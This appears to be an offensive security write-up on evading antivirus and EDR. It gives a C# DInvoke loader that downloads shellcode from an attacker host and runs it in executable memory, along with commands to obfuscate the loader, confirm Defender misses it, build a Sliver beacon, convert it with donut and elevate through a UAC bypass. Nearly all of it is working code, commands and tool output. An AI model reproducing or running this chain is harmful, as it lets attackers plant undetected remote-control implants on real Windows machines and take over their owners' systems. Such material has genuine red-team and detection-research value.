Bypass AV/EDR via DInvoke + Sliver
Last updated
Repository:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Net;

// DELEGATES and DInvokeFunctions live in DELEGATES.cs and DInvokeFunctions.cs of the project
// (they show up in the InvisibilityCloak output further down).
namespace DInvoke_Code
{
    class Program
    {
        static void Main(string[] args)
        {
            // DInvoke test: fetch the donut-generated shellcode (rev.bin) from the attacker host.
            byte[] codepent = new WebClient().DownloadData("http://192.168.1.109:8080/rev.bin");
            // Console.WriteLine((uint)codepent.Length);
            // System.Threading.Thread.Sleep(10000);

            IntPtr func_ptr = IntPtr.Zero;
            // IntPtr pHandle = Process.GetCurrentProcess().Handle;

            // Resolve VirtualAlloc from kernel32's export table at runtime (no P/Invoke import entry
            // in the assembly) and call it through a delegate. 0x1000 | 0x2000 = MEM_COMMIT | MEM_RESERVE,
            // 0x40 = PAGE_EXECUTE_READWRITE: a single RWX allocation is a common EDR signal.
            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "VirtualAlloc");
            DELEGATES.VirtualAllocRx VirtualAllocRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.VirtualAllocRx)) as DELEGATES.VirtualAllocRx;
            IntPtr rMemAddress = VirtualAllocRx(0, (uint)codepent.Length, 0x1000 | 0x2000, 0x40);
            Marshal.Copy(codepent, 0, (IntPtr)(rMemAddress), codepent.Length);

            // Start a thread at the shellcode entry point, again through a runtime-resolved CreateThread.
            IntPtr hThread = IntPtr.Zero;
            IntPtr pinfo = IntPtr.Zero;
            UInt32 threadId = 0;
            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "CreateThread");
            DELEGATES.CreateThreadRx CreateThreadRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.CreateThreadRx)) as DELEGATES.CreateThreadRx;
            hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId);

            // Block until the shellcode thread exits (0xFFFFFFFF = INFINITE) so the process stays alive.
            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "WaitForSingleObject");
            DELEGATES.WaitForSingleObjectRx WaitForSingleObjectRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.WaitForSingleObjectRx)) as DELEGATES.WaitForSingleObjectRx;
            WaitForSingleObjectRx(hThread, 0xFFFFFFFF);
        }
    }
}
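The loader above hides the interesting part behind DInvokeFunctions.GetLibraryAddress and the DELEGATES class, which the page does not show. The following is an added example, not code from the page's repository or from the DInvoke project, of what that pair does: find the base of an already-loaded module, walk its IMAGE_EXPORT_DIRECTORY by hand to get a function pointer, and call it through a delegate so the assembly's import table never names VirtualAlloc or VirtualProtect. It assumes a 64-bit .NET Framework process on Windows with kernel32.dll already loaded; the names Delegates, Resolver, Stub and the single-byte RET payload are made up for this example. It also shows the RW-then-RX pattern instead of the RWX page the loader requests.

```csharp
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace ExportWalkDemo
{
    // Delegate signatures mirror the Win32 prototypes. The attribute only matters on x86
    // (x64 has a single calling convention) but costs nothing to keep.
    public static class Delegates
    {
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        // Signature of the payload we call at the end: a bare RET stub takes no arguments.
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate void Stub();
    }

    public static class Resolver
    {
        // Base address of an already-loaded module through the managed Process API, so the
        // assembly carries no GetModuleHandle/GetProcAddress import entry.
        public static IntPtr GetModuleBase(string moduleName)
        {
            foreach (ProcessModule m in Process.GetCurrentProcess().Modules)
                if (string.Equals(m.ModuleName, moduleName, StringComparison.OrdinalIgnoreCase))
                    return m.BaseAddress;
            return IntPtr.Zero;
        }

        // Walk IMAGE_EXPORT_DIRECTORY of a loaded module and return the named function's address.
        public static IntPtr GetExportAddress(IntPtr moduleBase, string functionName)
        {
            int eLfanew = Marshal.ReadInt32(moduleBase, 0x3C);          // IMAGE_DOS_HEADER.e_lfanew
            IntPtr optHdr = moduleBase + eLfanew + 0x18;                 // Signature(4) + IMAGE_FILE_HEADER(20)
            ushort magic = (ushort)Marshal.ReadInt16(optHdr);            // 0x20B = PE32+, 0x10B = PE32
            int dataDir = magic == 0x20B ? 0x70 : 0x60;                  // offset of DataDirectory[0] (exports)
            int exportRva = Marshal.ReadInt32(optHdr, dataDir);
            int exportSize = Marshal.ReadInt32(optHdr, dataDir + 4);
            if (exportRva == 0) return IntPtr.Zero;

            IntPtr exp = moduleBase + exportRva;
            int numberOfNames = Marshal.ReadInt32(exp, 0x18);
            IntPtr functions = moduleBase + Marshal.ReadInt32(exp, 0x1C); // AddressOfFunctions
            IntPtr names = moduleBase + Marshal.ReadInt32(exp, 0x20);     // AddressOfNames
            IntPtr ordinals = moduleBase + Marshal.ReadInt32(exp, 0x24);  // AddressOfNameOrdinals

            for (int i = 0; i < numberOfNames; i++)
            {
                string name = Marshal.PtrToStringAnsi(moduleBase + Marshal.ReadInt32(names, i * 4));
                if (!string.Equals(name, functionName, StringComparison.Ordinal)) continue;

                ushort ordinal = (ushort)Marshal.ReadInt16(ordinals, i * 2);
                int funcRva = Marshal.ReadInt32(functions, ordinal * 4);
                // An RVA that points back inside the export directory is a forwarder string
                // ("OTHERDLL.Function"), not code. A full resolver repeats this walk in that DLL;
                // this sketch only reports it.
                if (funcRva >= exportRva && funcRva < exportRva + exportSize)
                    throw new NotSupportedException(functionName + " is forwarded to " + Marshal.PtrToStringAnsi(moduleBase + funcRva));
                return moduleBase + funcRva;
            }
            return IntPtr.Zero;
        }
    }

    class Program
    {
        static void Main()
        {
            IntPtr k32 = Resolver.GetModuleBase("kernel32.dll");
            var virtualAlloc = Marshal.GetDelegateForFunctionPointer<Delegates.VirtualAlloc>(
                Resolver.GetExportAddress(k32, "VirtualAlloc"));
            var virtualProtect = Marshal.GetDelegateForFunctionPointer<Delegates.VirtualProtect>(
                Resolver.GetExportAddress(k32, "VirtualProtect"));

            // Constructed stand-in for rev.bin: a single RET (0xC3), so the demo executes and returns.
            byte[] payload = { 0xC3 };

            // RW first, then RX: never asks for the RWX page (0x40) the loader above uses.
            IntPtr mem = virtualAlloc(IntPtr.Zero, (UIntPtr)(uint)payload.Length, 0x1000 | 0x2000, 0x04); // MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE
            Marshal.Copy(payload, 0, mem, payload.Length);
            uint old;
            if (!virtualProtect(mem, (UIntPtr)(uint)payload.Length, 0x20, out old))            // PAGE_EXECUTE_READ
                throw new InvalidOperationException("VirtualProtect failed");

            Marshal.GetDelegateForFunctionPointer<Delegates.Stub>(mem)();
            Console.WriteLine("kernel32 base 0x{0:X}, VirtualAlloc/VirtualProtect resolved by export walk, stub executed", (long)k32);
        }
    }
}
```

Two differences from the DInvoke library are worth knowing: the library finds module bases by walking the PEB loader lists rather than through Process.Modules, and it follows forwarded exports into the target DLL. Neither changes the on-disk import table, which is what the page's DefenderCheck step is measuring.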
Obfuscation project:
Modify lines 147 and 148 of InvisibilityCloak.py so that both files are opened as UTF-8:
openAssemblyInfoFile = open(assemblyInfoFile, 'r',encoding='utf-8')
openCopyAssemblyInfoFile = open(f"{assemblyInfoFile}_copy", "w",encoding='utf-8')
PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak > python.exe .\InvisibilityCloak.py -d ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload -n "Zero" -m reverse
====================================================
[*] INFO: String obfuscation method: reverse
[*] INFO: Directory of C# project: ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload
[*] INFO: New tool name: Zero
====================================================
[*] INFO: Generating new GUID for C# project
[*] INFO: New project GUID is f9d3c7e4-82de-4a66-9eba-8b0b3c149768
[*] INFO: Changing C# project GUID in below files:
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_shellcodeload.sln
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvoke_shellcodeload.csproj
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Properties\AssemblyInfo.cs
[*] INFO: Removing PDB string in C# project file
[*] INFO: Renaming DInvoke_shellcodeload.sln to Zero.sln
[*] INFO: Renaming DInvoke_shellcodeload.csproj to Zero.csproj
[*] INFO: Renaming directory DInvoke_shellcodeload to Zero
[+] SUCCESS: New GUID of f9d3c7e4-82de-4a66-9eba-8b0b3c149768 was generated and replaced in your project
[+] SUCCESS: New tool name of Zero was replaced in project
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvokeFunctions.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DELEGATES.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvokeFunctions.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Program.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x64\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs
[+] SUCCESS: Your new tool Zero now has the invisibility cloak applied.
FLARE-VM 04/30/2025 16:31:00
PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak >
In Visual Studio, set the project's Output Type to Windows Application so the loader runs without a console window.
Finally, rename every remaining occurrence of DInvoke in the project (namespaces, classes and file names) and build it as Release for x64.
PS C:\Users\maldev\Desktop\CompiledTools\DefenderCheck\DefenderCheck\DefenderCheck\bin\Release > .\DefenderCheck.exe C:\Users\maldev\Desktop\CompiledTools\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\bin\x64\Release\DInvoke_test.exe
[+] No threat found in submitted file!
sliver > generate beacon --http 192.168.1.109:1234 --os windows
[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 43s
[*] Implant saved to /home/Intrusionz3r0/Documents/Sliver/KOREAN_JUNKER.exe
sliver > http --lhost 192.168.1.109 --lport 1234
[*] Starting HTTP :1234 listener ...
[*] Successfully started job #2
sliver >
#Download and compile donut
Intrusionz3r0@htb[/htb]$ git clone https://github.com/TheWover/donut
Intrusionz3r0@htb[/htb]$ cd donut/
Intrusionz3r0@htb[/htb]$ make -f Makefile
Intrusionz3r0@htb[/htb]$ ./donut ./
When running donut, use -e 3 (random names + encryption) and -b 1 (no AMSI/WLDP/ETW bypass): the bypass stub donut would otherwise embed in the shellcode is detected.
❯ ./donut -i KOREAN_JUNKER.exe -b 1 -e 3 -o rev.bin
[ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "KOREAN_JUNKER.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : none
[ PE Headers : overwrite
[ Shellcode : "rev.bin"
[ Exit : Thread
With rev.bin served from http://192.168.1.109:8080/ (the URL hard-coded in the loader), the loader downloads and executes it and the beacon checks in to the Sliver HTTP listener.
❯ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
❯ cd UAC-BOF-Bonanza
❯ cp -rp ~/Documents/Tools/UAC-BOF-Bonanza/CmstpElevatedCOM/ ~/.sliver-client/extensions
❯ cd ~/.sliver-client/extensions/CmstpElevatedCOM
❯ make
sliver (KOREAN_JUNKER) > extensions load /home/Intrusionz3r0/.sliver-client/extensions/CmstpElevatedCOM
sliver (KOREAN_JUNKER) > armory install coff-loader
sliver (KOREAN_JUNKER) > CmstpElevatedCOM "C:\Users\maldev\Downloads\http-local-1234.exe"
[*] Successfully executed CmstpElevatedCOM (coff-loader)
[*] Got output:
Successfully spoofed PEB for explorer.exe
Successfully created elevated CMLuaUtil COM object
Calling ShellExec method from the elevated CMLuaUtil COM object...
ShellExec executed successfully!